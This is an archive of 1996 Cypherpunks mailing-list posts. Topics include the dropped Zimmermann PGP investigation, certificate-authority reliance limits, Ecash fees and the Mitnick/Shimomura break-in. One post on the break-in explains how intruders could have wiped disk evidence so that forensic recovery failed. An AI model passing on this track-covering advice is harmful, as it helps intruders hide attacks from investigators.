Message-ID: <Pine.SUN.3.91.960111091045.4338U-100000@goya>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 11 Jan 1996, Timothy C. May wrote:

> At 8:41 PM 1/10/96, David Mandl wrote:
> 
> >P.S.: Regarding limits on "freedom of speech" in the U.S., take a look
> >at the long list Tim May posted a few months back.  (I was scoffing at
> >Perry's claim that we had nearly complete freedom of speech in the
> >U.S., and then Tim responded with much more detail.)
> 
> This may have been more than a "few" months back...maybe even more than
> several. I'm not sure when I wrote this, and I have too many megs of past
> messages to find it.

Here it is:

Date: Fri, 30 Jun 1995 11:26:30 -0700
From: "Timothy C. May" <tcmay@sensemedia.net>
To: David Mandl <dmandl@bear.com>, cypherpunks@toad.com
Subject: Re: MORE *ANTI-INTERNET* PROP

>The gist (without examples right now) is that the U.S. has a truly stunning
>amount of regulation of speech. Between regulation of professions,
>restrictions on product claims, the whole mess of tort law, and the various
>anti-discrimination and fairness laws, the only speech which is truly free
>is that of penniless idiots spouting off in public parks.

I disagree with this, but no need to argue about it here.

   --D.

--
David Mandl
Bear, Stearns & Co. Inc.
Phone: (212) 272-3888
Email: dmandl@bear.com

--
*******************************************************************************
Bear Stearns is not responsible for any recommendation, solicitation, offer or
agreement or any information about any transaction, customer account or account
activity contained in this communication.
*******************************************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 13 Jan 1996 00:28:33 +0800
To: John Gilmore <cypherpunks@toad.com
Subject: Re: BIG NEWS: PRZ investigation dropped!
Message-ID: <199601120538.VAA02068@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


>From: Stanton McCandlish <mech@eff.org>
>Date: Thu, 11 Jan 1996 11:53:46 -0800 (PST)
>
>Justice Dept. dropped investigation of Phil Zimmermann, declines to 
>prosecute.

I never expected them to prosecute, unless he forced them to by
toilet bombing the court, but I did expect them to keep on
"investigating" him forever and a day.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Barrett/CheckFree Corporation <Andrew_Barrett@checkfree.com>
Date: Fri, 12 Jan 1996 18:26:02 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Mitnick Road Show
Message-ID: <9601111747.AA0296@6thstreetcheckfree.com>
MIME-Version: 1.0
Content-Type: text/plain


Andy P. wrote:

>Saw the Stanford seimnar given by Tsutomu Shimomura and John Markoff,
>on the subject of Tsutomu's pursuit of Kevin Mitnick.

Saw a teaser last night for Friday's broadcast of the Stone and Pauly show. 
Looks like they're doing a piece on Mitnick. They did not mention him by name, 
but used some of the epitaphs commonly associated with Mitnick since Markoff's 
Cyberpunk. Which makes sense, since most of the viewing public doesn't know 
Kevin Mitnick from Steve Jobs.

I just hope this piece is better than the infamous Unsolved Mysteries 
treatments. I am not holding my breath.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 12 Jan 1996 17:27:33 +0800
To: cypherpunks@toad.com
Subject: Minor correction about tax rates and witholding
Message-ID: <ad1a8162130210047568@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:21 PM 1/11/96, Gary Howland wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>> you think that's a bit ridiculous?  i'm paid via an NIH grant given to my
>> adivisor by the govt.  this stipend is taxed.  it didn't used to be
>> (started to be taxed around '86  i believe).  why the hell doesn't the
>> govt just save everyone the trouble and pay me less.  i'm sure they could
>> get rid of a couple of IRS people this way.
>
>It's even sillier over here in Europe, and the paperwork is probably
..

I didn't comment when the first remark was made, several days ago, but if
others are going to elaborate on it, I will now comment.

The government cannot simply take its cut before sending the stipend/salary
for a very good reason: they don't know the final tax rates of the
taxpayers!

Some people will end up paying no taxes, for whatever reasons (low overall
wages, lots of deductions and dependents, offsetting capital losses, etc.).
Others will pay 20%, and some may even pay more (doubtful, on a stipend,
but you get the point).

Clearly the government cannot simply "withold" 15%, say, nor can it know in
advance the precise amount to withold. A flat tax rate would make this more
possible, but would still not be completely accurate.

--Tim May

We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Fri, 12 Jan 1996 04:25:37 +0800
To: cypherpunks@toad.com
Subject: BIG NEWS: PRZ investigation dropped!
Message-ID: <9601112011.AA25213@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Stanton McCandlish <mech@eff.org>
Date: Thu, 11 Jan 1996 11:53:46 -0800 (PST)

Justice Dept. dropped investigation of Phil Zimmermann, declines to 
prosecute.
They put out a press rel. about it, already got a journo call regarding this.
More when I find it.
--
<HTML><A HREF="http://www.eff.org/~mech/">    Stanton McCandlish
</A><HR><A HREF="mailto:mech@eff.org">        mech@eff.org
</A><P><A HREF="http://www.eff.org/">         Electronic Frontier Foundation
</A><P>       Online Activist    </HTML>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 12 Jan 1996 15:49:01 +0800
To: cypherpunks@toad.com
Subject: Re:NSA
Message-ID: <199601111719.MAA16056@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----




- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMPVGgyoZzwIn1bdtAQG/1wGAwFELRklL0jv58QWSXMg8Z+OUNPX1OtXJ
UaI51iIBh2IjH1hggHtyMUi1B6xrlbmo
=h/+n
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jueneman@gte.com
Date: Fri, 12 Jan 1996 16:58:19 +0800
To: Michael Froomkin <cypherpunks@toad.com>
Subject: Reliance Limits Considered Harmful
Message-ID: <30F54978-00000001@wotan.gte.com>
MIME-Version: 1.0
Content-Type: text/plain


>Suppose I am a CA.  I am worried that by issuing a certificate with a 
>lifespan of more than 2 milliseconds I am opening myself up to unlimited 
>liability if for some reason, despite my best efforts, I issue an 
>erroneous certificate.
>
>I know I can write disclaimers, but that's not reliable since courts 
>often ignore them, and anyway it scares off customers.
>
>I know I can put an expiration date on the certificate, but that's not 
>enough.  I can accumulate a lot of exposure in a few seconds, much less 
>weeks.
>
>I know I can put a reliance limit in the X.509 ver 3 certificate, but 
>that's not enough.  Even a $1 limit could be used many millions of times.
>
>Is it feasabile to say: Can only be relied on once per day/week/month?  
>Is this something the relying parties can reasonably be expected to monitor?
>
>It seems to me that this sort of a limit is essential if a CA is to feel 
>comfortable outside Utah....
>
>A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
>Associate Professor of Law | 
>U. Miami School of Law     | froomkin@law.miami.edu
>P.O. Box 248087            | http://www.law.miami.edu/~froomkin
>Coral Gables, FL 33124 USA | It's warm here.
>

I have been troubled from the first with the concept of a reliance limit, in 
particular because of the problem Prof. Froomkin cites. In the "normal" 
paradigm for digital signatures, neither the CA nor the relying party(ies) have 
any knowledge of how many times that particular certificate/key has been used. 
As a result, there are few if any controls that would operate to enforce the 
notion of a reliance limit.

Even in the electronic credit card environment where there is some sort of a 
closed loop system (the purchases are reported back to the Issuing Bank, and 
presumably would be or could be known by the CA, which is probably acting as an 
agent of the bank), there are some substantial problems.

The first problem is one of privacy.  If I have a very high credit limit, I 
certainly don't want to advertise that fact in a public certificate. On the 
other hand, if I have a low limit, I don't want to advertise that either. And 
in any case, the reliance limit is not intended to be a "floor limit", i.e., an 
amount below which it is not required to contact the credit card company for 
authrotization.  (Floor limits used to be popular, especially in Europe where  
the cost of telecommuncations was high. But now almost all transactions are 
authorized against the customer's current balance and credit limit, and if the 
merchant doesn't check he can be stuck with the charge if the customer doesn't 
pay.)

I have argued (quite unsuccessfully in the credit card community) that the 
reliance limit can provide a useful means of limiting the subscriber's exposure 
(as well as the CA's) in the event of a security compromise affecting the 
subscriber's private key.  Since there are no perfect computer security 
solutions available at any price, much less an affordable price, both the 
subscriber and the CA have to make a tradeoff between their risks and the 
rewards of greater convenience, etc. I tried to get around the privacy issue in 
the credit card environment by treating a negative reliance limit as a 
percentage of the customer credit limit. But no one in the credit card industry 
was convinced, and maybe I'm not either.

The concept of a reliance limit is enshrined in the Utah Digital Signature 
statute (and the ABA draft Digital Signature Guidelines), where it is wrapped 
up with a draconian requirement that registered CAs have to put up a surety 
bond or irrevocable letter or credit in the amount of 30% of the aggregate of 
all outstanding reliance limits.  This is not just an insurance policy -- a 
CA's corporate assets are pledged to back up the certificates issued, not 
withstanding the fact that the identification system we have in this country is 
not sufficiently reliable to warrant such representations.  And surely no CA is 
going to hire private investigators to check out who someone claims to be with 
sufficient credibility as to be able to issue certificates to individuals -- at 
least if they intend to charge any kind of a reasonable price for the 
certificates. In my personal opinion, that requirement in the Utah law makes it 
highly unlikely that anyone will ever become a registered CA in Utah, unless 
the reliance limit is set to $1 and/or the expiration period to about 1 
millisecond.  

(Maybe the Utah statute was really trying to set up a lottery, rather than a 
system for registering CAs.  Everyone gets to play, and if you can find a 
person who has invalid credentials, even if issued through an innocuous 
clerical error (someone misspelled the street name in someone's address), you 
can claim you were harmed in some way, sue them big time and collect millions.  
That's the American way, isn't it? :-)

Although X.509 v3 provides a simple mechanism to allow additional attributes, 
potentially including a reliance limit, to be included in the certificate, 
there are at present no plans that I know of for any existing CA to actually do 
so, or more importantly, for anyone else's software to be able to read and 
comprehend those reliance limits or perform any checking.

As a purely technical matter, the problem could be solved by requiring the 
relying party to validate the transaction (not just the certificate) with the 
CA in real time.  (Checking a CRL database isn't good enough.) By providing a 
transaction amount, the CA could keep track of the extent of its liability, and 
could detect misuse. Alternatively, the subscriber could request a new 
certificate for each one time use. However, both of these "solutions" would 
require a significant extension to the current mechanisms, and also give rise 
to a number of privacy issues.

In addition, there are other practical problems.  If I am the relying party (or 
the CA), and the subscriber is using his digital signature to confirm an order 
to sell futures on the commodities market, how can I evaluate the potential 
risk?  If the subscriber is selling futures for orange juice and a storm wipes 
out all of the orange trees, his losses could be unbounded. Similar situations 
could exist in the case of a signature on a patent claim, and creative people 
can probably think of many more cases.

Although the notion of a reliance limit usually arises in conjunction with 
digital signatures, it would presumably apply to certificates used for message 
encryption, to set up encrypted sessions, etc., as well. This puts the CA in an 
even more difficult position, for now we are not talking about a (single) 
financial transaction.  If I send an encrypted message to someone, and it turns 
out that the person who received it was not who he claimed be, I may in fact be 
greatly harmed. (If the message wasn't important, why would I have encrypted it 
in the first place. Suits for violation of privacy have resulted in millions of 
dollars in damages  -- does that mean that the CA ought to provide a million 
dollar reliance limit?

My conclusion after having thought about this a lot is that reliance limits are 
at best ineffective and at worst positively harmful.  They are difficult or 
impossible to enforce in any meaningful way, they raise substantial privacy 
issues, and at least as codified in the Utah Act and the draft Digital 
Signature Guidelines they will almost surely act to dissuade any prudent 
business from setting up a licensed CA.

Does this mean that the subscriber, relying party, and CA all have effectively 
unbounded liability, absent a stated reliance limit?

No, I don't think so, but we may have to change our paradigm a little bit.

Most people accept a driver's license as providing a degree of proof of 
someone's identity, but very few would consider it proof positive. Since the 
state-issued driver's license is the only practical means of identication 
available to a CA in the case of private individuals, that consitutes the 
weakest link in the system and is quite likely to remain so.

The only other identification document I am aware of that is available to 
private individuals that provides substantially better identification than a 
driver's license is a permit to carry a concealed weapon. Here in 
Massachusetts, obtaining a pistol permit requires a trip to the local police 
station, where you are photographed, fingerprinted, and two or more affidavits 
concerning your character are reviewed prior to submitting your fingerprints 
and picture to the FBI, where a search of the NCIC database is used to 
determine if you have any prior arrests, etc. The permit card that is issued 
carries your residence or business address, your picture, fingerprint, date and 
place of birth, height, weight, complexion, hair color, eye color, and 
occupation. Since the Brady Bill was passed, I believe that many states have 
set up similar systems. (Of course many jurisdictions sharply limit who can 
actually receive a weapons permit.  I'm only describing the process, not 
debating the reasonableness or unreasonableness of gun controls.)

Even if state laws were amended to make this degree of identification assurance 
available for purposes other than weapons permits, many if not most people 
would have strong reservations about the privacy implications. And to the best 
of my knowledge, private companies are not allowed to access the NCIC, also for 
privacy reasons.

Does all this mean that digital signatures are worthless?  No, not at all. But 
it does mean that they are unlikely to convey a degree of surety as to 
someone's identity that is very much stronger than a driver's license 
identification.

In my personal opinion, I think we need to establish a stronger degree of "no 
fault" protection for CAs that follow the rules.  Whose rules are to be 
followed, and who audits them for conformance are valid issues.  We clearly 
don't want irresponsible CAs issuing certificates to all and sundry, but we 
can't make the cost of entry into the business so high that no one takes on the 
burden of being a CA at all.  The issue is how to balance risks, the costs, and 
the rewards equitably between the subscriber, the relying party, and the CA.

In the case of the credit/debit card industry, the credit card companies charge 
a fee that covers both the risk and their administrative costs. If digital 
signatures can be used to reduce their risks, presumably the fees charged to 
the merchants can be reduced somewhat. But in any case, the fee that is charged 
is proportional to the amount of the transaction, and therefore statistically 
covers the risk.

The real question is what to do outside of the credit card industry, where 
certificates may be used for transactions are much more complex, and where 
there may not be the infrastructure to collect a percentage fee for each use.

Please copy me directly on any replies, as (to the best of my knowledge) I am 
not a subscriber to cypherpunks.

Bob

----------------------------
Robert R. Jueneman
GTE Laboratories
1-617-466-2820 

"The opinions expressed are my own, and may or may not
reflect the official position of GTE, if any."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark (Mookie) <mark@zang.com>
Date: Fri, 12 Jan 1996 07:13:05 +0800
To: cypherpunks@toad.com
Subject: Mitnik and Shimomura
Message-ID: <199601112238.MAA04861@zang.com>
MIME-Version: 1.0
Content-Type: text



>Shimomura had almost complete packet traces of the break-in, which
>allowed him to reconstruct the attack.

>It was a trap.

It was not a trap. Shimomura was caught with his proverbials down. His
arrogance made him complacent and as such he didnt take the most basic
steps to keep the attack out.

According to Tsutomo's own account of the incident he was only able to
decipher what happened because the attacker(s) didnt clean away the info
off the hard drive when they were finished. They rm'd sure but he dd'd
the raw disk to another drive and worked through the blocks until he
found the two tools that were used to effect the intrusion. He was also
able to recover the tcpdump logs that were erased.

If the intruder(s) had rm'd the data and THEN done a mkfile that filled the
disk with 0's then most of what we know today would not be available.
As mentioned a week or two back, filling the unused portions of blocks with
0's would probably also be necessary.

As to wether Mitnik is capable of effecting the intrusion, that is yet to
be ascertained. He claims no involvement in it and based on whats known of
his cracking prowess there is a certain truth to it. He's infinitely better
with a phone than a keyboard.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Frank O. Trotter, III" <ftrotter@marktwain.com>
Date: Fri, 12 Jan 1996 16:25:23 +0800
To: Cypherpunks List <cypherpunks@toad.com>
Subject: E-cash and Interest
Message-ID: <199601111911.AA16628@mail.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


Once the Ecash Mint and the account (in our case the WorldCurrency
Access account - others will be different) are merged, the balance
you hold in the Mint may be able to earn interest.  Like an
individual, the amount of interest offered  will involve a cost benefit 
relationship based on cost of funds, regulation,  and operational 
costs, but there should be no obvious reason not to pay something 
in most curencies.

One note, under US banking regulation, "transaction accounts" fall
under different rules than money market accounts, savings accounts,
and NOW accounts.  Depending on the exact functionality desired, 
and future regulation changes, there will be more or less incentive
and/or legal ability to pay interest.

Given the current functionality of Ecash there will be little 
incentive to hold balances on your hard drive once interest is
available.  It is just too easy to move the money down when
you need it.  Today there is no specific cost incentive between 
the Mint and your hard drive.

It does not take a long leap to see that when the account and the
Mint are merged, that since the Mint _is_ the account, PC/Internet 
banking, debit and all other regular banking functionality can
become immediately integrated!


Frank Trotter
ftrotter@marktwain.com
Opinions expressed are my own....



> On Wed, 10 Jan 1996, Tim Philp wrote:
> 
> > With the E-cash systems that I have seen, you generate your own E-cash 
> > and have it signed by a 'bank' At that moment, it becomes like cash in 
> > your wallet and you loose interest that this money could be earning.
> 
> >From the standpoint of monetary economics, this is correct.  The (ecash)
> bank has the right to use your deposits to give out loans.  When you
> withdraw your money (and turn it into either cash or ecash) they (the
> bank) no longer have the right to turn your deposits into loans. 
> Withdrawn cash/ecash can not earn interest.
> 
> This is the problem of (e)cash: if you have it on hand you _must_ forgo
> any interest earnings.  Theoretically, the optimum holding of (e)cash is a
> function of interest rate (the greater the interest rate, the less cash on
> hand), transaction cost of making withdrawals (the easier and more
> convenient the withdrawals, the less cash on hand), and the "providence
> value" of cash (the more you value instant gratification, the more cash on
> hand). 
> 
> Thats why ATM machines have caused us to hold less cash.  We can now keep
> money in the bank (letting it earn interest and letting the bank create
> loans with it) and withdraw from ATM terminals only when we need it.
> 
> -------------------------------------------------------------------------------
> Patiwat Panurach      	     Whatever you can do, or dream you can, begin it.
> eMAIL: pati@ipied.tu.ac.th      Boldness has genius, power and magic in it.
> m/18 junior Fac of Economics		-Johann W.Von Goethe
> -------------------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Fri, 12 Jan 1996 06:48:02 +0800
To: cypherpunks@toad.com
Subject: Re: Zimmermann case is dropped.
In-Reply-To: <30F5A6B0@ms-mail.datastorm.com>
Message-ID: <199601112225.OAA17391@netcom23.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Phil Writes:

 > This brings to a close a criminal investigation that has spanned the
 > last three years.  I'd like to thank all the people who helped us in
 > this case, especially all the donors to my legal defense fund. 

Gosh - I guess the NSA finally managed to crack PGP after all.  (sigh)

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Fri, 12 Jan 1996 06:01:18 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: When they came for the Jews...
In-Reply-To: <2.2.32.19960110153325.006b5980@panix.com>
Message-ID: <199601112133.OAA12590@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 An entity calling itself Duncan Frissel is alleged to have written:
>
> 
> "I favor discrimination on the basis of race, creed, color sex, age,
> alienage, previous condition of servitude, recent interstate travel,
> handicap, sexual or affectional preference, marital status, Vietnam-era
> veteran status (or lack thereof), occupation, economic status, and anything
> else I can think of."
> 
> 



"Color sex"?   Oh nevermind...



Bryce, Just Another Conspirator Against Democracy

signatures follow


      "To strive, to seek, to find and not to yield."  -Tennyson
            <a href="http://www.c2.org/~bryce/Niche.html">

                          bryce@colorado.edu                </a>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMPWCMfWZSllhfG25AQGcIwQAq8x9Cf8DfbPHcGVodfC7pyB5Jv+0RqUr
6kJ+fN1lA329OSdFOViFQc1rDlZd/OroLXn5Sgfw1nmx0+zfYLRlxrW3iScFtHDT
C2PsNLBeUvqhf/zurnRSk0sX1ehdrNywGfuw6R0fWAGLKqaxXw7Kpntc88ZMVG/6
7ZEjb9j9Etw=
=W3DD
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Frank O. Trotter, III" <ftrotter@marktwain.com>
Date: Fri, 12 Jan 1996 05:38:16 +0800
To: Cypherpunks List <cypherpunks@toad.com>
Subject: New Ecash Consumer Fee Schedule
Message-ID: <199601112113.AA14249@mail.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


-----------------------------------------------------------
                   MARK TWAIN BANK
                    (Member FDIC)
                      ANNOUNCES 
        NEW CONSUMER FEE STRUCTURE FOR ECASH

See all the information at: www.marktwain.com
            or email us at: Ecash-info@marktwain.com

Mark Twain Bank is rolling back consumer Ecash fees 
in reaction to the tremendous positive response to Ecash.  
"Because of the level of interest we have elected to 
reward users for their acceptance of Ecash,"  said Frank 
Trotter, Mark Twain Ecash project director.  "Ecash 
represents the future of money and we want to make it
available to all Internet users."

Ecash enables you to control your money and your privacy
while doing business on the Internet.

The Ecash software is available free of charge when you sign 
up for an account.  Once your application has been approved
you can download the software directly from the Internet
and start using Ecash right away!

WORLD CURRENCY ACCESS ACCOUNTS ARE INSURED BY THE FDIC.  
AMOUNTS HELD IN THE ECASH MINT OF ON YOUR HARD DRIVE ARE
NOT INSURED BY THE FIDC.


NEW FEES FOR CONSUMERS
-----------------------

There is no charge for movement of money within 
the Ecash system!  Once the money is in Ecash you can do as 
many transactions as you like and it won't cost you anything 
more!

There is only a charge to move money back and forth between your
WorldCurrency Access account and the Ecash system (much like 
an ATM fee).  

Depending on the Schedule you select, and the balances you keep,
there may be no monthly fee for your WorldCurrency Access account 
or for money movements between your WorldCurrency Access account
and the Ecash Mint!

That means a no monthly fee account is within your reach!
--------------------------------------------------------

Remember that you can also earn interest by maintaining a 
balance over $2,500 in an interest bearing WorldCurrency 
Access account.

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

SCHEDULE OF CHARGES

You choose the option that suits you best:


             Schedule 1     Schedule 2     Schedule 3     
==========================================================
Ecash Account
Opening Fee    $11.00         $25.00         $25.00    

Monthly Fee:     1.00                2.00             5.00

Number of included 
monthly transfers 
in to Mint:                1                    2                  5
(any dollar amount!)

Cost of 
transactions 
within Ecash 
system:                Zero             Zero              Zero

Average balance
in WorldCurrency
Access to waive 
Monthly Fee:        $500             $750            $1,500

Cost per additional 
transfer to Mint:     3.00              2.00                1.00

Move money out
of Mint:                 5.00%            4.50%             4.00%
(percent of balance transferred)

Additional transfers to Mint and fees to move money out of
Mint apply at all balance levels.

=================================================
Explanation of fees:

There are several types of fees that are designed to be easy
to understand, and low where you want them to be low.

1) Ecash Account Opening fee - this covers the processing 
   involved in setting  up an account.

2) Monthly Maintenance Fee - low if you are an infrequent 
   user - higher if you want to reduce your overall cost.  
   The monthly fee covers the scheduled number of  
   transfers to the Ecash system from your WorldCurrency 
   Access Account, and each schedule type receive a
   different charge for transfers from the Ecash system
   Back to the WorldCurrency Access account.

3) Additional transfer fee - cost per additional transfer 
   per month to the Ecash system from your WorldCurrency 
   Access account- if you just do one large one per month 
   then you may never need this.

4) Move money out of Mint - when you want to move your 
   money from the Ecash system to your WorldCurrency Access 
   account.  To make this cost effective to you there is no 
   minimum charge per transfer charge, only a charge based 
   on a percentage of the balance transferred!

5) Average Balance in WorldCurrency Access to waive Monthly 
   Fee: If you maintain this amount as an average daily 
   balance for the entire interest payment period, the 
   monthly fee will be waived.  Additional transfer fees 
   and "Move money out of Mint" fees will continue to apply 
   and can result in a charge.


Contact: Mark Twain Bank
         Frank O. Trotter, III
         Vice President Capital Markets Group
         Director International Markets Division
         ftrotter@marktwain.com
         Phone: +314-997-9213   Fax: +314-569-4906
===========================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ckey2@eng.ua.edu (Christopher R. Key)
Date: Wed, 17 Jan 1996 04:10:39 +0800
Subject: Re: A weakness in PGP signatures, and a suggested solution (long)
In-Reply-To: <199601030407.UAA12551@comsec.com>
Message-ID: <1996Jan11.152134.127675@ua1ix.ua.edu>
MIME-Version: 1.0
Content-Type: text/plain


In article <Pine.ULT.3.91.960110182255.18692H-100000@xdm011>, Jeffrey Goldberg <cc047@Cranfield.ac.uk> says:

{SNIP}
>I have omitted the other scenarios for reasons of space.  All of
>them are based on the fact that information about the intended
>recipient (including newsgroup) is not part of the information signed.
>
>I proposal is made for a mechanism to have some header information
>signed as well.
>
{SUPER-SNIP}
First of all, if the recipient is a newsgroup, why would that particular
information need to be part of the signed information?  If you post to a
newsgroup a message that is only signed (as opposed to encrypted also), 
then you are obviously not worried about who reads it.  The signature is 
only a method of proving that the important text (message) is unchanged and
intact, and that the person who it is supposed to be from is the same who 
signed it.

Secondly, if you are sending email to some one and sign it using pgp, wouldn't
that person need pgp to prove that in fact you did sign it?  Then it can be
reasonable that if that person has pgp to prove the signature, that person has
pgp to decrypt mail sent to them.  Simply sign you message and encrypt it 
using that person's public key.  All of this (from what I remember reading)
is in the pgp manual, and is one of the key methods for using public key 
encryption.

So if all that needs be done to a message to insure that the appropriate 
person reads it is encrypt it using their public key, why does pgp (or one
of the pgp interfaces) need to be changed to include header information?  
I think it just includes more well already.  "If it ain't broke, don't fix
it."

"That's all Ah've got to say about that."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 12 Jan 1996 07:54:31 +0800
To: hallam@w3.org
Subject: Re: Zimmermann case is dropped.
In-Reply-To: <9601112236.AA04283@zorch.w3.org>
Message-ID: <199601112329.PAA15617@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	We've made no progress. Phil has lots lots of time and gained
lots of grey hairs, and everyone who donated to his defense fund lost
money.
	The US can still harass people if they want, and make their
life hell.

-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JMKELSEY@delphi.com
Date: Sat, 13 Jan 1996 00:27:54 +0800
To: cypherpunks@toad.com
Subject: Limiting Reuse of Certificates
Message-ID: <01HZW0SKW2K29BX1TS@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[To: cypherpunks list ## Date: 01/11/96 02:25 pm ##
 Subject: Limiting reuse of certificates. ]

>Date: Mon, 08 Jan 1996 17:31:24 -0500 (EST)
>From: Michael Froomkin <froomkin@law.miami.edu>
>Subject: Certificates: limiting your liability with reuse limitations

>Suppose I am a CA.  I am worried that by issuing a certificate with
>a lifespan of more than 2 milliseconds I am opening myself up to
>unlimited liability if for some reason, despite my best efforts, I
>issue an erroneous certificate.

>I know I can put an expiration date on the certificate, but that's
>not enough.  I can accumulate a lot of exposure in a few seconds,
>much less weeks.

>I know I can put a reliance limit in the X.509 ver 3 certificate,
>but that's not enough.  Even a $1 limit could be used many millions
>of times.

>Is it feasabile to say: Can only be relied on once per
>day/week/month? Is this something the relying parties can reasonably
>be expected to monitor?

This is a hard problem.  The only way I can see to do this is to
require interaction with the CA (or its proxy) for each signature.
The good news is that if you're doing certificate revokation lists
online, then there is probably already some interaction with the
server to verify that a certificate is still valid, before it is
accepted.

The trick here is to flip around who has to check the CRL server.

a.   Bob forms
     D = document he wants signed,
     ID_B = Bob's ID,
and sends to Alice
     M_0 = ID_B, D.

b.   Alice forms
     T = timestamp
and sends to the Server
     M_1 = T, hash(ID_B, D), Sign_{SK_A}(T, hash(ID_B, D)).

c.   The Server verifies the timestamp, the signature, and that
Alice is currently allowed to sign things (her certificate is valid
and hasn't been overused today).  If not, it drops the connection
and ends the protocol.  If things all check out, however, it forms
     M_2 = T, Sign{SK_S}(T, hash(ID_B, D), Certificate_A).

d.   Alice now has (until the timestamp T becomes too stale) an
authorization to sign D.  She does so, and sends to Bob (who's been
waiting all this time)
     M_3 = T, ID_B, D, Certificate_A, M_2, Sign_{SK_A}(ID_B, D).

Now, the trick is to redefine valid signatures as only those that
look like M_3.  The recipient has to verify the timestamp, and that
he hasn't received an identical signature from Alice recently, and
has to verify the two signatures.

(I make no promises about the soundness of this protocol--it's meant
to illustrate the idea, not to be used directly.)

Other than that, I can't think of anything that will fit the bill.

>A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
>Associate Professor of Law |
>U. Miami School of Law     | froomkin@law.miami.edu
>P.O. Box 248087            | http://www.law.miami.edu/~froomkin
>Coral Gables, FL 33124 USA | It's warm here.

Note:  Please respond via e-mail as well as or instead of posting,
as I get CP-LITE instead of the whole list.

   --John Kelsey, jmkelsey@delphi.com
 PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMPV110Hx57Ag8goBAQFVggP+P9ilz7cM8BQX+nDgjByG4avAoHxgDpDw
cWsx7dw31MQsPCEkzvuvCcwf36e4xEQd3jKMh5rYmWrYRAMQAoB4yGm7ixN4tqXH
1g6Xw9QPCLnW4OJvjfynzFfKb5i8KcvOSBnCXzOd1Z/LYEI23/6phdNd9rRf/YjL
mxbKS7gDrHI=
=dn6t
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolann@censored.org>
Date: Fri, 12 Jan 1996 06:38:14 +0800
To: cypherpunks@toad.com
Subject: Re: Zimmermann case is dropped.
Message-ID: <199601112215.PAA28808@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


CLAP!!!  CLAP!!! CLAP!!! CLAP!!!

At 03:35 AM 1/8/96 -0700, you wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>My lead defense lawyer, Phil Dubois, received a fax this morning from
>the Assistant US Attorney in Northern District of California, William
>Keane.  The letter informed us that I "will not be prosecuted in connection
>with the posting to USENET in June 1991 of the encryption program
